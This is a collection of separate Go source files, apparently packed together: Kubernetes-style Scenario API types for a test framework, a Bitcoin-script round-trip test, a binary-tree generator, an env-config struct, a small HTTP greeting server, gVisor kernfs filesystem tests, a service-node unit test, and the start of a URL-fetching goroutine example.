	DependsOn *WaitSpec `json:"depends,omitempty"`
	// Assert defines the conditions that must be maintained after the action has been started.
	// If the evaluation of the condition is false, the Scenario will abort immediately.
	// +optional
	Assert *ConditionalExpr `json:"assert,omitempty"`
	// EmbedActions holds the per-type payload; exactly one of its fields
	// is expected to be set, matching ActionType.
	*EmbedActions `json:",inline"`
}
// WaitSpec describes the preconditions that gate an action's execution.
type WaitSpec struct {
	// Running waits for the given groups to be running
	// +optional
	Running []string `json:"running,omitempty"`
	// Success waits for the given groups to be succeeded
	// +optional
	Success []string `json:"success,omitempty"`
	// After is the time offset since the beginning of this action.
	// +optional
	After *metav1.Duration `json:"after,omitempty"`
}
// DeleteSpec is the payload of an ActionDelete action.
type DeleteSpec struct {
	// Jobs is a list of jobs to be deleted. The format is {"kind":"name"}, e.g, {"service","client"}
	Jobs []string `json:"jobs"`
}
// EmbedActions is the union of per-ActionType payloads embedded in Action;
// the field matching the action's ActionType is the one that applies.
type EmbedActions struct {
	// +optional
	Service *GenerateObjectFromTemplate `json:"service,omitempty"`
	// +optional
	Cluster *ClusterSpec `json:"cluster,omitempty"`
	// +optional
	Chaos *GenerateObjectFromTemplate `json:"chaos,omitempty"`
	// +optional
	Cascade *CascadeSpec `json:"cascade,omitempty"`
	// +optional
	Delete *DeleteSpec `json:"delete,omitempty"`
	// +optional
	Call *CallSpec `json:"call,omitempty"`
}
// TestdataVolume describes the shared test-data volume mounted across the
// Scenario's services.
type TestdataVolume struct {
	// Claim is the persistent volume claim that backs the test data.
	Claim v1.PersistentVolumeClaimVolumeSource `json:"volume,omitempty"`
	// GlobalNamespace if disabled, all containers see the same root directory. If enabled, each container
	// sees its own namespace.
	// +optional
	GlobalNamespace bool `json:"globalNamespace,omitempty"`
}
// ScenarioSpec defines the desired state of Scenario.
type ScenarioSpec struct {
	// TestData defines a volume that will be mounted across the Scenario's Services.
	TestData *TestdataVolume `json:"testData,omitempty"`
	// Actions are the tasks that will be taken.
	Actions []Action `json:"actions"`
	// Suspend flag tells the controller to suspend subsequent executions, it does
	// not apply to already started executions. Defaults to false.
	// +optional
	Suspend *bool `json:"suspend,omitempty"`
}
// ScenarioStatus defines the observed state of Scenario.
type ScenarioStatus struct {
	// Lifecycle holds the phase/reason/message/conditions shared by all
	// Frisbee resources.
	Lifecycle `json:",inline"`
	// ScheduledJobs is a list of references to the names of executed actions.
	// +optional
	ScheduledJobs []string `json:"scheduledJobs,omitempty"`
	// GrafanaEndpoint points to the local Grafana instance
	GrafanaEndpoint string `json:"grafanaEndpoint,omitempty"`
	// PrometheusEndpoint points to the local Prometheus instance
	PrometheusEndpoint string `json:"prometheusEndpoint,omitempty"`
	// Dataviewer points to the local Dataviewer instance
	DataviewerEndpoint string `json:"dataviewerEndpoint,omitempty"`
}
// Table returns a tabular form of the status for pretty printing: phase,
// reason, escaped message, and the currently-true condition types.
func (in *ScenarioStatus) Table() (header []string, data [][]string) {
	header = []string{
		"Phase",
		"Reason",
		"Message",
		"Conditions",
	}
	// encode message to escape it
	message, _ := json.Marshal(in.Message)
	// encode conditions for better visualization
	var conditions strings.Builder
	{
		if len(in.Conditions) > 0 {
			for _, condition := range in.Conditions {
				if condition.Status == metav1.ConditionTrue {
					// NOTE(review): condition types are concatenated with
					// no separator — confirm whether a delimiter is intended.
					conditions.WriteString(condition.Type)
				}
			}
		} else {
			// placeholder shown when no conditions are recorded
			conditions.WriteString("\t----")
		}
	}
	data = append(data, []string{
		in.Phase.String(),
		in.Reason,
		string(message),
		conditions.String(),
	})
	return header, data
}
// GetReconcileStatus returns the scenario's lifecycle for the reconciler.
func (in *Scenario) GetReconcileStatus() Lifecycle {
	return in.Status.Lifecycle
}

// SetReconcileStatus stores the lifecycle computed by the reconciler.
func (in *Scenario) SetReconcileStatus(lifecycle Lifecycle) {
	in.Status.Lifecycle = lifecycle
}
// +kubebuilder:object:root=true
// ScenarioList contains a list of Scenario.
type ScenarioList struct {
	metav1.TypeMeta `json:",inline"`
	metav1.ListMeta `json:"metadata,omitempty"`
	// Items are the scenarios in the list.
	Items []Scenario `json:"items"`
}
// TestNames returns, for each scenario in the list, the namespace it runs
// in — the namespace doubles as the test identifier (it is the "Test"
// column in Table).
func (in *ScenarioList) TestNames() []string {
	testNames := make([]string, len(in.Items))
	for i, scenario := range in.Items {
		testNames[i] = scenario.GetNamespace()
	}
	return testNames
}
// Table returns a tabular form of the structure for pretty printing, with
// the most recently created scenarios first.
func (in *ScenarioList) Table() (header []string, data [][]string) {
	header = []string{
		"Test",
		"Scenario",
		"Age",
		"Actions",
		"Phase",
		"Duration",
	}
	// arrange in descending order (latest created goes first)
	sort.SliceStable(in.Items, func(i, j int) bool {
		return in.Items[i].GetCreationTimestamp().After(in.Items[j].GetCreationTimestamp().Time)
	})
	for i := range in.Items {
		_, rows := in.Items[i].Table()
		data = append(data, rows...)
	}
	return header, data
}
// init registers the Scenario types with the scheme builder so they can be
// encoded/decoded by the API machinery.
func init() {
	SchemeBuilder.Register(&Scenario{}, &ScenarioList{})
}
|
package script
import (
"bytes"
"testing"
)
// s is the fixture script shared by the marshal/unmarshal round-trip tests.
var s = Script([]command{
	OP_1,
	OP_2,
	OP_2DUP,
	OP_EQUAL,
	OP_NOT,
	OP_VERIFY,
	OP_SHA1,
	OP_SWAP,
	OP_SHA1,
	OP_EQUAL,
})
// TestScriptMarshal checks that the fixture script serialises to the
// expected byte sequence.
func TestScriptMarshal(t *testing.T) {
	buf, err := s.Marshal()
	if err != nil {
		// the original discarded this error, hiding marshal failures
		t.Fatalf("Marshal: %v", err)
	}
	want := []byte{10, 81, 82, 110, 135, 145, 105, 167, 124, 167, 135}
	if !bytes.Equal(buf, want) {
		t.Errorf("Marshal() = %v, want %v", buf, want)
	}
}
// TestScriptUnmarshal checks that marshalling and unmarshalling the
// fixture script round-trips every command.
func TestScriptUnmarshal(t *testing.T) {
	buf, err := s.Marshal()
	if err != nil {
		// the original discarded this error, hiding marshal failures
		t.Fatalf("Marshal: %v", err)
	}
	newS := *new(Script).Unmarshal(bytes.NewReader(buf))
	// guard the element-wise comparison: without this, a short decode
	// would panic with an index out of range instead of failing cleanly
	if len(newS) != len(s) {
		t.Fatalf("Unmarshal length = %d, want %d", len(newS), len(s))
	}
	for i := range s {
		if !s[i].Equal(newS[i]) {
			t.Errorf("command %d differs after round-trip", i)
		}
	}
}
|
package main
import (
"binary_tree/tree"
"flag"
"fmt"
"math/rand"
"os"
"time"
)
// main builds a random binary tree (size and value mode set by flags) and
// either emits GraphViz dot output (-g) or pretty-prints the tree.
func main() {
	graphViz := flag.Bool("g", false, "GraphViz dot output on stdout")
	n := flag.Int("n", 5, "number of nodes in random tree")
	nonrandvals := flag.Bool("r", false, "use sequential node values")
	flag.Parse()
	// mix in the PID so two runs started in the same nanosecond still differ
	rand.Seed(time.Now().UnixNano() + int64(os.Getpid()))
	root := generateRandom(*n, *nonrandvals)
	if *graphViz {
		tree.Draw(root)
		return
	}
	tree.Print(root)
	fmt.Println()
}
// generateRandom builds a random binary tree with n nodes. When
// nonrandvals is true the node values are the sequence 0..n-1; otherwise
// they are uniform random ints in [0, n).
func generateRandom(n int, nonrandvals bool) tree.Node {
	ary := make([]int, n)
	for i := range ary {
		if nonrandvals {
			ary[i] = i
		} else {
			// rand.Intn already returns an int — the original wrapped it
			// in a redundant int() conversion
			ary[i] = rand.Intn(n)
		}
	}
	return something(ary)
}
// something recursively builds a tree from ary: a random pivot becomes the
// node's value, the elements before it form the left subtree and the
// elements after it form the right subtree. An empty slice yields nil.
func something(ary []int) *tree.NumericNode {
	if len(ary) == 0 {
		return nil
	}
	if len(ary) == 1 {
		return &tree.NumericNode{Data: ary[0]}
	}
	// rand.Intn(n) returns a value in [0, n), so the original's
	// "if div >= len(ary) { div-- }" adjustment was dead code.
	div := rand.Intn(len(ary))
	return &tree.NumericNode{
		Data:  ary[div],
		Left:  something(ary[:div]),
		Right: something(ary[div+1:]),
	}
}
|
package main
import (
"github.com/kelseyhightower/envconfig"
)
// Specification are env variables used by ems
// split_words is used by envconfig
// Specification are env variables used by ems.
// split_words is used by envconfig, so a field like MinioAccessKey is read
// from EMS_MINIO_ACCESS_KEY (the "EMS" prefix is supplied by ParseENV).
type Specification struct {
	MinioAccessKey string `split_words:"true"`
	MinioSecretKey string `split_words:"true"`
	MinioEndpoint string `split_words:"true"`
	EtcdSnapshotBucket string `split_words:"true"`
	EtcdObjectName string `split_words:"true"`
}
// ParseENV parses the environment for EMS-prefixed variables and returns
// the populated Specification.
func ParseENV() (*Specification, error) {
	var s Specification
	if err := envconfig.Process("EMS", &s); err != nil {
		return nil, err
	}
	return &s, nil
}
|
package main
import (
"fmt"
"net/http"
"github.com/instantup/greeting"
)
// main registers the /hello endpoint and serves HTTP on port 8080.
// ListenAndServe blocks; its terminal error is printed before exit.
func main() {
	http.HandleFunc("/hello", HelloHandler)
	err := http.ListenAndServe(":8080", nil)
	if err != nil {
		fmt.Println(err)
	}
}
// HelloHandler answers /hello?name=... with a plain-text greeting
// produced by the greeting package; write errors are printed and
// otherwise ignored (the response is already in flight).
func HelloHandler(writer http.ResponseWriter, request *http.Request) {
	query := request.URL.Query()
	message := greeting.Hello(query.Get("name"))
	writer.Header().Add("Content-Type", "text/plain")
	_, err := writer.Write([]byte(message))
	if err != nil {
		fmt.Println(err)
	}
}
|
// Copyright 2019 The gVisor Authors.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package kernfs_test
import (
"bytes"
"fmt"
"testing"
"github.com/google/go-cmp/cmp"
"gvisor.dev/gvisor/pkg/abi/linux"
"gvisor.dev/gvisor/pkg/context"
"gvisor.dev/gvisor/pkg/errors/linuxerr"
"gvisor.dev/gvisor/pkg/fspath"
"gvisor.dev/gvisor/pkg/sentry/contexttest"
"gvisor.dev/gvisor/pkg/sentry/fsimpl/kernfs"
"gvisor.dev/gvisor/pkg/sentry/fsimpl/testutil"
"gvisor.dev/gvisor/pkg/sentry/kernel/auth"
"gvisor.dev/gvisor/pkg/sentry/vfs"
"gvisor.dev/gvisor/pkg/usermem"
)
// defaultMode is the mode used for files created by tests: 01777
// (world-writable with the sticky bit).
const defaultMode linux.FileMode = 01777

// staticFileContent is the canned payload served by files built with
// filesystem.newFile in these tests.
const staticFileContent = "This is sample content for a static test file."

// RootDentryFn is a generator function for creating the root dentry of a test
// filesystem. See newTestSystem.
type RootDentryFn func(context.Context, *auth.Credentials, *filesystem) kernfs.Inode
// newTestSystem sets up a minimal environment for running a test, including an
// instance of a test filesystem. Tests can control the contents of the
// filesystem by providing an appropriate rootFn, which should return a
// pre-populated root dentry.
func newTestSystem(t *testing.T, rootFn RootDentryFn) *testutil.System {
	ctx := contexttest.Context(t)
	creds := auth.CredentialsFromContext(ctx)
	// Fresh VFS instance per test; Init must run before any registration.
	v := &vfs.VirtualFilesystem{}
	if err := v.Init(ctx); err != nil {
		t.Fatalf("VFS init: %v", err)
	}
	// Register under the name "testfs"; the rootFn closure decides what
	// the mounted tree looks like.
	v.MustRegisterFilesystemType("testfs", &fsType{rootFn: rootFn}, &vfs.RegisterFilesystemTypeOptions{
		AllowUserMount: true,
	})
	mns, err := v.NewMountNamespace(ctx, creds, "", "testfs", &vfs.MountOptions{}, nil)
	if err != nil {
		t.Fatalf("Failed to create testfs root mount: %v", err)
	}
	// testutil.System owns cleanup; callers defer sys.Destroy().
	return testutil.NewSystem(ctx, t, v, mns)
}
// fsType is the vfs.FilesystemType for the test filesystem; rootFn is
// invoked by GetFilesystem to build the root inode.
type fsType struct {
	rootFn RootDentryFn
}

// filesystem is the test filesystem, a thin wrapper around
// kernfs.Filesystem.
type filesystem struct {
	kernfs.Filesystem
}

// MountOptions implements vfs.FilesystemImpl.MountOptions.
func (fs *filesystem) MountOptions() string {
	return ""
}

// file is a read-only file inode whose contents are the fixed string in
// content, served via the DynamicBytesFile machinery (see Generate).
type file struct {
	kernfs.DynamicBytesFile
	content string
}
// newFile creates a file inode that serves the given static content.
// The file is world-accessible (mode 0777) on device 0:0.
func (fs *filesystem) newFile(ctx context.Context, creds *auth.Credentials, content string) kernfs.Inode {
	f := &file{}
	f.content = content
	// f is passed as its own data source: Generate below emits f.content.
	f.DynamicBytesFile.Init(ctx, creds, 0 /* devMajor */, 0 /* devMinor */, fs.NextIno(), f, 0777)
	return f
}
// Generate implements the DynamicBytesFile data source: it writes the
// file's static content into buf and never fails.
func (f *file) Generate(ctx context.Context, buf *bytes.Buffer) error {
	fmt.Fprintf(buf, "%s", f.content)
	return nil
}
// attrs wraps kernfs.InodeAttrs but rejects all attribute changes,
// making every inode that embeds it effectively immutable.
type attrs struct {
	kernfs.InodeAttrs
}

// SetStat always fails with EPERM, overriding the embedded InodeAttrs.
func (*attrs) SetStat(context.Context, *vfs.Filesystem, *auth.Credentials, vfs.SetStatOptions) error {
	return linuxerr.EPERM
}
// readonlyDir is a directory inode whose children are fixed at creation
// time: InodeDirectoryNoNewChildren rejects create/mkdir/etc., and the
// embedded attrs rejects SetStat.
type readonlyDir struct {
	readonlyDirRefs
	attrs
	kernfs.InodeAlwaysValid
	kernfs.InodeDirectoryNoNewChildren
	kernfs.InodeNoStatFS
	kernfs.InodeNotAnonymous
	kernfs.InodeNotSymlink
	kernfs.InodeTemporary
	kernfs.InodeWatches
	kernfs.OrderedChildren
	locks vfs.FileLocks
}
// newReadonlyDir creates a read-only directory inode pre-populated with
// contents. The link count is bumped by one per populated subdirectory.
func (fs *filesystem) newReadonlyDir(ctx context.Context, creds *auth.Credentials, mode linux.FileMode, contents map[string]kernfs.Inode) kernfs.Inode {
	dir := &readonlyDir{}
	dir.attrs.Init(ctx, creds, 0 /* devMajor */, 0 /* devMinor */, fs.NextIno(), linux.ModeDirectory|mode)
	// Writable defaults to false, so Insert/Unlink via syscalls will fail.
	dir.OrderedChildren.Init(kernfs.OrderedChildrenOptions{})
	dir.InitRefs()
	dir.IncLinks(dir.OrderedChildren.Populate(contents))
	return dir
}
// Open implements kernfs.Inode.Open by handing back a generic directory
// FD over the ordered children; seeking past the end lands on the static
// entries.
func (d *readonlyDir) Open(ctx context.Context, rp *vfs.ResolvingPath, kd *kernfs.Dentry, opts vfs.OpenOptions) (*vfs.FileDescription, error) {
	fd, err := kernfs.NewGenericDirectoryFD(rp.Mount(), kd, &d.OrderedChildren, &d.locks, &opts, kernfs.GenericDirectoryFDOptions{
		SeekEnd: kernfs.SeekEndStaticEntries,
	})
	if err != nil {
		return nil, err
	}
	return fd.VFSFileDescription(), nil
}
// DecRef drops a reference, destroying the inode when the count hits zero.
func (d *readonlyDir) DecRef(ctx context.Context) {
	d.readonlyDirRefs.DecRef(func() { d.Destroy(ctx) })
}
// dir is a mutable directory inode: unlike readonlyDir it supports
// creating files and subdirectories (NewDir/NewFile below), which is why
// it keeps a back-pointer to the owning filesystem.
type dir struct {
	dirRefs
	attrs
	kernfs.InodeAlwaysValid
	kernfs.InodeNoStatFS
	kernfs.InodeNotAnonymous
	kernfs.InodeNotSymlink
	kernfs.InodeTemporary
	kernfs.InodeWatches
	kernfs.OrderedChildren
	locks vfs.FileLocks
	fs    *filesystem // back-pointer used to allocate child inodes
}
// newDir creates a writable directory inode pre-populated with contents.
func (fs *filesystem) newDir(ctx context.Context, creds *auth.Credentials, mode linux.FileMode, contents map[string]kernfs.Inode) kernfs.Inode {
	dir := &dir{}
	dir.fs = fs
	dir.attrs.Init(ctx, creds, 0 /* devMajor */, 0 /* devMinor */, fs.NextIno(), linux.ModeDirectory|mode)
	// Writable: true is the only difference from newReadonlyDir's children.
	dir.OrderedChildren.Init(kernfs.OrderedChildrenOptions{Writable: true})
	dir.InitRefs()
	dir.IncLinks(dir.OrderedChildren.Populate(contents))
	return dir
}
// Open implements kernfs.Inode.Open; identical to readonlyDir.Open.
func (d *dir) Open(ctx context.Context, rp *vfs.ResolvingPath, kd *kernfs.Dentry, opts vfs.OpenOptions) (*vfs.FileDescription, error) {
	fd, err := kernfs.NewGenericDirectoryFD(rp.Mount(), kd, &d.OrderedChildren, &d.locks, &opts, kernfs.GenericDirectoryFDOptions{
		SeekEnd: kernfs.SeekEndStaticEntries,
	})
	if err != nil {
		return nil, err
	}
	return fd.VFSFileDescription(), nil
}
// DecRef drops a reference, destroying the inode when the count hits zero.
func (d *dir) DecRef(ctx context.Context) {
	d.dirRefs.DecRef(func() { d.Destroy(ctx) })
}
// NewDir implements kernfs.Inode.NewDir: it allocates a child directory
// and inserts it under name, rolling back the allocation on collision.
func (d *dir) NewDir(ctx context.Context, name string, opts vfs.MkdirOptions) (kernfs.Inode, error) {
	creds := auth.CredentialsFromContext(ctx)
	dir := d.fs.newDir(ctx, creds, opts.Mode, nil)
	if err := d.OrderedChildren.Insert(name, dir); err != nil {
		// Insert failed (e.g. name exists); release the orphaned inode.
		dir.DecRef(ctx)
		return nil, err
	}
	d.TouchCMtime(ctx)
	// A new subdirectory's ".." adds a link to the parent.
	d.IncLinks(1)
	return dir, nil
}
// NewFile implements kernfs.Inode.NewFile: it creates an empty file
// inode and inserts it under name, rolling back on collision.
func (d *dir) NewFile(ctx context.Context, name string, opts vfs.OpenOptions) (kernfs.Inode, error) {
	creds := auth.CredentialsFromContext(ctx)
	f := d.fs.newFile(ctx, creds, "")
	if err := d.OrderedChildren.Insert(name, f); err != nil {
		// Insert failed; release the orphaned inode.
		f.DecRef(ctx)
		return nil, err
	}
	d.TouchCMtime(ctx)
	return f, nil
}
// NewLink, NewSymlink and NewNode are unsupported on the test dir; all
// fail with EPERM.
func (*dir) NewLink(context.Context, string, kernfs.Inode) (kernfs.Inode, error) {
	return nil, linuxerr.EPERM
}
func (*dir) NewSymlink(context.Context, string, string) (kernfs.Inode, error) {
	return nil, linuxerr.EPERM
}
func (*dir) NewNode(context.Context, string, vfs.MknodOptions) (kernfs.Inode, error) {
	return nil, linuxerr.EPERM
}
// Name implements vfs.FilesystemType.Name.
// NOTE(review): returns "kernfs" while newTestSystem registers the type
// as "testfs" — mounting goes through the registered name, so this only
// affects display; confirm the mismatch is intentional.
func (fsType) Name() string {
	return "kernfs"
}

// Release implements vfs.FilesystemType.Release; nothing to clean up.
func (fsType) Release(ctx context.Context) {}

// GetFilesystem implements vfs.FilesystemType.GetFilesystem: it builds a
// fresh filesystem whose root inode comes from the test's rootFn.
func (fst fsType) GetFilesystem(ctx context.Context, vfsObj *vfs.VirtualFilesystem, creds *auth.Credentials, source string, opt vfs.GetFilesystemOptions) (*vfs.Filesystem, *vfs.Dentry, error) {
	fs := &filesystem{}
	fs.VFSFilesystem().Init(vfsObj, &fst, fs)
	root := fst.rootFn(ctx, creds, fs)
	var d kernfs.Dentry
	d.Init(&fs.Filesystem, root)
	return fs.VFSFilesystem(), d.VFSDentry(), nil
}
// -------------------- Remainder of the file are test cases --------------------

// TestBasic verifies that a file populated at mount time can be looked up.
func TestBasic(t *testing.T) {
	sys := newTestSystem(t, func(ctx context.Context, creds *auth.Credentials, fs *filesystem) kernfs.Inode {
		return fs.newReadonlyDir(ctx, creds, 0755, map[string]kernfs.Inode{
			"file1": fs.newFile(ctx, creds, staticFileContent),
		})
	})
	defer sys.Destroy()
	sys.GetDentryOrDie(sys.PathOpAtRoot("file1")).DecRef(sys.Ctx)
}

// TestMkdirGetDentry verifies that a directory created via MkdirAt in a
// writable dir is subsequently resolvable.
func TestMkdirGetDentry(t *testing.T) {
	sys := newTestSystem(t, func(ctx context.Context, creds *auth.Credentials, fs *filesystem) kernfs.Inode {
		return fs.newReadonlyDir(ctx, creds, 0755, map[string]kernfs.Inode{
			"dir1": fs.newDir(ctx, creds, 0755, nil),
		})
	})
	defer sys.Destroy()
	// Note the path contains spaces on purpose; names need no escaping here.
	pop := sys.PathOpAtRoot("dir1/a new directory")
	if err := sys.VFS.MkdirAt(sys.Ctx, sys.Creds, pop, &vfs.MkdirOptions{Mode: 0755}); err != nil {
		t.Fatalf("MkdirAt for PathOperation %+v failed: %v", pop, err)
	}
	sys.GetDentryOrDie(pop).DecRef(sys.Ctx)
}

// TestReadStaticFile verifies that reading a static file returns exactly
// the content it was created with.
func TestReadStaticFile(t *testing.T) {
	sys := newTestSystem(t, func(ctx context.Context, creds *auth.Credentials, fs *filesystem) kernfs.Inode {
		return fs.newReadonlyDir(ctx, creds, 0755, map[string]kernfs.Inode{
			"file1": fs.newFile(ctx, creds, staticFileContent),
		})
	})
	defer sys.Destroy()
	pop := sys.PathOpAtRoot("file1")
	fd, err := sys.VFS.OpenAt(sys.Ctx, sys.Creds, pop, &vfs.OpenOptions{
		Flags: linux.O_RDONLY,
	})
	if err != nil {
		t.Fatalf("OpenAt for PathOperation %+v failed: %v", pop, err)
	}
	defer fd.DecRef(sys.Ctx)
	content, err := sys.ReadToEnd(fd)
	if err != nil {
		t.Fatalf("Read failed: %v", err)
	}
	if diff := cmp.Diff(staticFileContent, content); diff != "" {
		t.Fatalf("Read returned unexpected data:\n--- want\n+++ got\n%v", diff)
	}
}

// TestCreateNewFileInStaticDir verifies that O_CREAT|O_EXCL creates a
// file in a writable directory and that the file outlives its first FD.
func TestCreateNewFileInStaticDir(t *testing.T) {
	sys := newTestSystem(t, func(ctx context.Context, creds *auth.Credentials, fs *filesystem) kernfs.Inode {
		return fs.newReadonlyDir(ctx, creds, 0755, map[string]kernfs.Inode{
			"dir1": fs.newDir(ctx, creds, 0755, nil),
		})
	})
	defer sys.Destroy()
	pop := sys.PathOpAtRoot("dir1/newfile")
	opts := &vfs.OpenOptions{Flags: linux.O_CREAT | linux.O_EXCL, Mode: defaultMode}
	fd, err := sys.VFS.OpenAt(sys.Ctx, sys.Creds, pop, opts)
	if err != nil {
		t.Fatalf("OpenAt(pop:%+v, opts:%+v) failed: %v", pop, opts, err)
	}
	// Close the file. The file should persist.
	fd.DecRef(sys.Ctx)
	fd, err = sys.VFS.OpenAt(sys.Ctx, sys.Creds, pop, &vfs.OpenOptions{
		Flags: linux.O_RDONLY,
	})
	if err != nil {
		t.Fatalf("OpenAt(pop:%+v) = %+v failed: %v", pop, fd, err)
	}
	fd.DecRef(sys.Ctx)
}
// TestDirFDReadWrite verifies that read/write on a directory FD fail
// with EISDIR and EBADF respectively.
func TestDirFDReadWrite(t *testing.T) {
	sys := newTestSystem(t, func(ctx context.Context, creds *auth.Credentials, fs *filesystem) kernfs.Inode {
		return fs.newReadonlyDir(ctx, creds, 0755, nil)
	})
	defer sys.Destroy()
	pop := sys.PathOpAtRoot("/")
	fd, err := sys.VFS.OpenAt(sys.Ctx, sys.Creds, pop, &vfs.OpenOptions{
		Flags: linux.O_RDONLY,
	})
	if err != nil {
		t.Fatalf("OpenAt for PathOperation %+v failed: %v", pop, err)
	}
	defer fd.DecRef(sys.Ctx)
	// Read/Write should fail for directory FDs.
	if _, err := fd.Read(sys.Ctx, usermem.BytesIOSequence([]byte{}), vfs.ReadOptions{}); !linuxerr.Equals(linuxerr.EISDIR, err) {
		t.Fatalf("Read for directory FD failed with unexpected error: %v", err)
	}
	if _, err := fd.Write(sys.Ctx, usermem.BytesIOSequence([]byte{}), vfs.WriteOptions{}); !linuxerr.Equals(linuxerr.EBADF, err) {
		t.Fatalf("Write for directory FD failed with unexpected error: %v", err)
	}
}

// TestDirFDIterDirents verifies that listing the root reports each child
// with the right dirent type across inode implementations.
func TestDirFDIterDirents(t *testing.T) {
	sys := newTestSystem(t, func(ctx context.Context, creds *auth.Credentials, fs *filesystem) kernfs.Inode {
		return fs.newReadonlyDir(ctx, creds, 0755, map[string]kernfs.Inode{
			// Fill root with nodes backed by various inode implementations.
			"dir1": fs.newReadonlyDir(ctx, creds, 0755, nil),
			"dir2": fs.newDir(ctx, creds, 0755, map[string]kernfs.Inode{
				"dir3": fs.newDir(ctx, creds, 0755, nil),
			}),
			"file1": fs.newFile(ctx, creds, staticFileContent),
		})
	})
	defer sys.Destroy()
	pop := sys.PathOpAtRoot("/")
	sys.AssertAllDirentTypes(sys.ListDirents(pop), map[string]testutil.DirentType{
		"dir1":  linux.DT_DIR,
		"dir2":  linux.DT_DIR,
		"file1": linux.DT_REG,
	})
}
// TestDirWalkDentryTree exercises kernfs.Dentry.WalkDentryTree from both
// the root and an interior dentry, covering ".."/"." traversal and
// missing-path ENOENT cases.
func TestDirWalkDentryTree(t *testing.T) {
	sys := newTestSystem(t, func(ctx context.Context, creds *auth.Credentials, fs *filesystem) kernfs.Inode {
		return fs.newDir(ctx, creds, 0755, map[string]kernfs.Inode{
			"dir1": fs.newDir(ctx, creds, 0755, nil),
			"dir2": fs.newDir(ctx, creds, 0755, map[string]kernfs.Inode{
				"file1": fs.newFile(ctx, creds, staticFileContent),
				"dir3":  fs.newDir(ctx, creds, 0755, nil),
			}),
		})
	})
	defer sys.Destroy()
	// testWalk resolves getDentryPath via the VFS (the expected dentry)
	// and walkPath via WalkDentryTree (the dentry under test), then
	// checks both the error and that the two dentries are identical.
	testWalk := func(from *kernfs.Dentry, getDentryPath, walkPath string, expectedErr error) {
		var d *kernfs.Dentry
		if getDentryPath != "" {
			pop := sys.PathOpAtRoot(getDentryPath)
			vd := sys.GetDentryOrDie(pop)
			defer vd.DecRef(sys.Ctx)
			d = vd.Dentry().Impl().(*kernfs.Dentry)
		}
		match, err := from.WalkDentryTree(sys.Ctx, sys.VFS, fspath.Parse(walkPath))
		if err == nil {
			defer match.DecRef(sys.Ctx)
		}
		if err != expectedErr {
			t.Fatalf("WalkDentryTree from %q to %q (with expected error: %v) unexpected error, want: %v, got: %v", from.FSLocalPath(), walkPath, expectedErr, expectedErr, err)
		}
		if expectedErr != nil {
			return
		}
		if d != match {
			t.Fatalf("WalkDentryTree from %q to %q (with expected error: %v) found unexpected dentry; want: %v, got: %v", from.FSLocalPath(), walkPath, expectedErr, d, match)
		}
	}
	rootD := sys.Root.Dentry().Impl().(*kernfs.Dentry)
	// Walks anchored at the root.
	testWalk(rootD, "dir1", "/dir1", nil)
	testWalk(rootD, "", "/dir-non-existent", linuxerr.ENOENT)
	testWalk(rootD, "", "/dir1/child-non-existent", linuxerr.ENOENT)
	testWalk(rootD, "", "/dir2/inner-non-existent/dir3", linuxerr.ENOENT)
	testWalk(rootD, "dir2/dir3", "/dir2/../dir2/dir3", nil)
	testWalk(rootD, "dir2/dir3", "/dir2/././dir3", nil)
	testWalk(rootD, "dir2/dir3", "/dir2/././dir3/.././dir3", nil)
	// Walks anchored at dir2; note ".." cannot escape above the anchor.
	pop := sys.PathOpAtRoot("dir2")
	dir2VD := sys.GetDentryOrDie(pop)
	defer dir2VD.DecRef(sys.Ctx)
	dir2D := dir2VD.Dentry().Impl().(*kernfs.Dentry)
	testWalk(dir2D, "dir2/dir3", "/dir3", nil)
	testWalk(dir2D, "dir2/dir3", "/../../../dir3", nil)
	testWalk(dir2D, "dir2/file1", "/file1", nil)
	testWalk(dir2D, "dir2/file1", "file1", nil)
}
|
package main
import (
"fmt"
tree "github.com/adadesions/goalgo/trees/tree"
)
// main builds a three-node binary tree — 92 at the root, 100 as the left
// child, 108 as the right child — and prints the root node.
func main() {
	left := tree.Node{Data: 100}
	right := tree.Node{Data: 108}
	rootNode := tree.Node{
		Data:  92,
		Left:  &left,
		Right: &right,
	}
	fmt.Println(rootNode)
}
|
package core
import (
"testing"
"github.com/sirupsen/logrus"
)
// TestService is a stub Service implementation used by TestNewNode; its
// Name is derived from the "key" entry of the config it was Init'd with,
// so differently-configured instances are distinguishable.
type TestService struct{ config *ServiceConfig }

// Name returns "Test-<key>" from the stored config.
func (ts *TestService) Name() string { return "Test-" + ts.config.GetString("key") }

// Init stores the per-instance config; the node argument is unused.
func (ts *TestService) Init(_ *Node, config *ServiceConfig) error {
	ts.config = config
	return nil
}

// The lifecycle and status methods are no-ops for the stub.
func (ts *TestService) Start() error                           { return nil }
func (ts *TestService) Stop() error                            { return nil }
func (ts *TestService) Status() ServiceStatus                  { return 0 }
func (ts *TestService) SubscribeStatus(func(ServiceStatus))   {}
func (ts *TestService) UnsubscribeStatus(func(ServiceStatus)) {}
// TestNewNode verifies that NewNode instantiates only the services named
// in the NodeConfig (TestService2/3, not the also-registered
// TestService1) and that each is retrievable by its derived name.
func TestNewNode(t *testing.T) {
	logrus.SetLevel(logrus.TraceLevel)
	services := NewAvailableServices()
	// Three registered; the config below selects only two of them.
	services.Register("TestService1", &TestService{})
	services.Register("TestService2", &TestService{})
	services.Register("TestService3", &TestService{})
	config := NodeConfig{
		{
			"service": "TestService2",
			"key":     "key2",
		},
		{
			"service": "TestService3",
			"key":     "key3",
		},
	}
	node, err := NewNode(services, config)
	if err != nil {
		t.Error(err)
	}
	if len(node.Services) != 2 {
		t.Errorf("len(node.Services)=%v", len(node.Services))
	}
	// Names come from TestService.Name(): "Test-" + config key.
	if node.GetService("Test-key2") == nil {
		t.Error("service Test-key2 not found")
	}
	if node.GetService("Test-key3") == nil {
		t.Error("service Test-key3 not found")
	}
}
|
//go routines
package main
import (
"fmt"
"net/http"
"sync"
"time"
)
// returnType fetches url and prints the request start time followed by
// the response's content-type. Errors are printed and swallowed (best
// effort); the response body is closed on the success path.
func returnType(url string) {
	// The original used fmt.Printf(time.Now().String()): a non-constant
	// format string (flagged by go vet) that would mangle output if the
	// timestamp ever contained a '%'. Print writes the string verbatim.
	fmt.Print(time.Now().String())
	resp, err := http.Get(url)
	if err != nil {
		fmt.Printf("error: %s\n", err)
		return
	}
	defer resp.Body.Close()
